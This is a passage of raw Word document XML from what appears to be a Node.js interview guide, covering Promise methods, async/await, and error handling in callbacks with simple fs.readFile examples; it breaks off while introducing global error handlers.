        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.then() and .catch()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Chain .then() for handling success and .catch() for handling errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCD07A6" w14:textId="77777777" w:rsidR="007B134F" w:rsidRPr="00DA2F32" w:rsidRDefault="007B134F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="578"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.finally()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: Executes a callback regardless of whether the Promise was fulfilled or rejected, useful for cleanup tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2166C055" w14:textId="77777777" w:rsidR="00E316C0" w:rsidRPr="00DA2F32" w:rsidRDefault="00E316C0" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="169" w:name="_Toc178383351"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Error Handling with </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>async/await</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="169"/>
    </w:p>
    <w:p w14:paraId="7DED4B1A" w14:textId="77777777" w:rsidR="00E316C0" w:rsidRPr="00DA2F32" w:rsidRDefault="00E316C0" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="580"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Declares an asynchronous function that returns a Promise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13671690" w14:textId="77777777" w:rsidR="00E316C0" w:rsidRPr="00DA2F32" w:rsidRDefault="00E316C0" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="580"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">: Pauses execution of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> function until the Promise is resolved or rejected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D95E5D" w14:textId="77777777" w:rsidR="00E316C0" w:rsidRPr="00DA2F32" w:rsidRDefault="00E316C0" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="580"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>try/catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">: Catches errors that occur during the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4FAE71" w14:textId="77777777" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00EB2BF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CE526DF" w14:textId="59454C59" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="170" w:name="_Toc178383352"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How do you handle errors in callback functions?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="170"/>
    </w:p>
    <w:p w14:paraId="5D5EFF31"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1. The Standard Callback Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2070F097" w14:textId="77777777" w:rsidR="00E316C0" w:rsidRPr="00DA2F32" w:rsidRDefault="00E316C0" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In Node.js, the standard callback pattern follows the convention of passing an error as the first argument to the callback function. If the operation is successful, the first argument (error) is null or undefined, and the second argument contains the result. If an error occurs, the first argument is an Error object, and the second argument is usually omitted or undefined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CA9903"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Example of the Standard Callback Pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D9B139"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6A70BCEF"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20D05F4"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fs.readFile('file.txt', 'utf8', (err, data) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AA0F0C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F101C0C"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reading file:', err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6810DD49"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A062D0F"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9FB75BD"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content:', data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE08C9C"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77EF1F2"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2. Handling Errors in Callback Functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C14B060" w14:textId="77777777" w:rsidR="00E316C0" w:rsidRPr="00DA2F32" w:rsidRDefault="00E316C0" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When working with callbacks, you need to explicitly check for and handle errors within the callback. Here’s how to do it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BF1617" w14:textId="77777777" w:rsidR="00E316C0" w:rsidRPr="00DA2F32" w:rsidRDefault="00E316C0" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="581"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Check the Error First</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Always check if the err parameter is not null or undefined. If an error is present, handle it (e.g., log it, return an error response, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBF2136" w14:textId="77777777" w:rsidR="00E316C0" w:rsidRPr="00DA2F32" w:rsidRDefault="00E316C0" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="581"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Early Return</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: After handling the error, use return; to exit the callback early, preventing the rest of the code from executing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6869D894"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Example of Error Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0319F3"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fs = require('fs');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68075691"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7C90E9F7"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fs.readFile('file.txt', 'utf8', (err, data) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6C9B25"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0788C25F"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console.error('Failed to read file:', err.message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24956784"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B104DA"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C13E721"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content:', data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12969EDA"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758DE13"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3. Propagating Errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674C4050" w14:textId="77777777" w:rsidR="00E316C0" w:rsidRPr="00DA2F32" w:rsidRDefault="00E316C0" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In complex applications, you might need to propagate errors back to the caller, especially in scenarios where functions are deeply nested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734C2CDA"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Example of Propagating Errors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034DD166"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readFileCallback(filePath, callback) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B66DB4B"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fs.readFile(filePath, 'utf8', (err, data) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F7B0A8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2040D06F"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 callback(err); // Propagate the error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7188FD06"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2F5FD30E"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callback(null, data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A308DF1"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3C1FF77"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4723273"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C0644C9"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readFileCallback('file.txt', (err, data) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4789B926"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0990B076"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err.message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECE678D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F67470B"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81D3B06"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console.log('File content:', data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746E40B3"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4B505F8"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4. Avoiding Callback Hell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB2C725" w14:textId="77777777" w:rsidR="00E316C0" w:rsidRPr="00DA2F32" w:rsidRDefault="00E316C0" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When multiple asynchronous operations are chained together using callbacks, it can lead to deeply nested code, known as "callback hell." This makes error handling and code maintenance difficult.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388EBE4B"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Strategies to Avoid Callback Hell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572713CB" w14:textId="77777777" w:rsidR="00E316C0" w:rsidRPr="00DA2F32" w:rsidRDefault="00E316C0" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="582"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Modularize Callbacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Break the logic into smaller functions to make the code more manageable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112F36B4" w14:textId="77777777" w:rsidR="00E316C0" w:rsidRPr="00DA2F32" w:rsidRDefault="00E316C0" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="582"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Promises or async/await</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Convert callback-based functions to return Promises, which can then be handled using async/await for cleaner and more readable code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5256B4"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5. Handling Errors in Nested Callbacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D523E4" w14:textId="77777777" w:rsidR="00E316C0" w:rsidRPr="00DA2F32" w:rsidRDefault="00E316C0" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>When dealing with nested callbacks, each level of callback should handle its own errors, or the errors should be propagated up the chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCE95E8"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Example of Handling Errors in Nested Callbacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4940D3E5"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firstTask(callback) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570DCE95"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fs.readFile('file1.txt', 'utf8', (err, data) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BB1487"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return callback(err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0F562F"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callback(null, data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6A2C6E"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6374C68"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627B0074"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3CD57B5"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secondTask(data, callback) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AA6E02"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Process data and perform another asynchronous operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004AFF7F"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fs.writeFile('output.txt', data, (err) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58386A86"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return callback(err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075B8A26"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callback(null, 'Success');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCF9225"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7F267413"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13FE68E"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B7C8D90"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firstTask((err, data) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444F74BA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373DD761"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in first task:', err.message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7C7143"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73120D0D"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68B9347"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39DBF79"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secondTask(data, (err, result) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C72CAB"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if (err) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5509804D"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console.error('Error in second task:', err.message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688BDE31"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return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D7DDEF"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C69F562"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7F7AF75"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console.log(result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3412E2E9"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5397E274" w14:textId="77777777" w:rsidR="00E316C0" w:rsidRPr="00DA2F32" w:rsidRDefault="00E316C0"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04D765DE" w14:textId="77777777" w:rsidR="00E316C0" w:rsidRPr="00DA2F32" w:rsidRDefault="00E316C0" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6. Transition to Promises and async/await</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566BB470" w14:textId="77777777" w:rsidR="00E316C0" w:rsidRPr="00DA2F32" w:rsidRDefault="00E316C0" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Due to the complexity of managing errors with callbacks, many developers transition to Promises or async/await for handling asynchronous code, as these patterns offer better readability and error handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E913F3F" w14:textId="77777777" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00EB2BF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53688033" w14:textId="3D2A6281" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="171" w:name="_Toc178383353"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is a global error handler and how do you implement one in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="171"/>
    </w:p>
    <w:p w14:paraId="654D3564" w14:textId="77777777" w:rsidR="004C5D08" w:rsidRPr="00DA2F32" w:rsidRDefault="004C5D08" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>global error handler</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
